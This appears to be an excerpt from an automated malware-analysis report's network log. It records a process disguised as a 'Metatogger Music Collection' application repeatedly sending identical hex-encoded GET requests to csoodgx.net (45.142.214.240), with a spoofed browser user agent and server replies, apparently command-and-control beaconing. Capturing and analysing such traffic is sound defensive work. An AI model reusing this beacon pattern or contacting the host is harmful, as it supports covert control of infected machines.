                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          25192.168.2.54974045.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:07.520008087 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:07.818260908 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:07 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          26192.168.2.54974145.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:08.153311014 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:08.456115961 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          27192.168.2.54974245.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:08.794656038 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:09.091121912 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:08 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:09.201668024 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:09.503828049 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          28192.168.2.54974445.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:09.844841957 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:10.152059078 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:10 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.54974645.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:10.485513926 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:10.786386013 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:10 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.54974745.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:11.167851925 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:11.476926088 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:11 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.54974845.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:13.038892984 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:13.344556093 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:13 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:13.452003956 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:13.752072096 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:13 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.54974945.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:14.094012976 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:14.401448965 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:14 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:14.514655113 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:14.812182903 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:14 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:14.920798063 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:15.224502087 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:15 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.54975045.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:15.568464041 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:15.867146969 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:15 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.54975145.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:16.200825930 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:16.509687901 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:16 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.54975245.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:16.841602087 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:17.147675991 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:17 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.54975345.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:17.483335018 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:17.791408062 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:17 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:17.904398918 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:18.211899042 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:18 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.54975445.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:18.543549061 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:18.839035034 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:18 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:18.951435089 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:19.252229929 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:19 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.54975545.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:19.594654083 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:19.894037962 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:19 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.54975645.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:20.232000113 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:20.537019014 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:20 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          40192.168.2.54975745.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:20.874262094 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:21.181425095 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:21 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.54975845.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:21.519109011 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:21.820341110 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:21 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          42192.168.2.54975945.142.214.240806408C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Mar 29, 2024 12:10:22.153074980 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:22.468333006 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20
                                                                          Mar 29, 2024 12:10:22.576565981 CET326OUTGET /search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 HTTP/1.1
                                                                          Host: csoodgx.net
                                                                          User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                          Mar 29, 2024 12:10:22.871659040 CET220INHTTP/1.1 200 OK
                                                                          Server: nginx/1.20.1
                                                                          Date: Fri, 29 Mar 2024 11:10:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
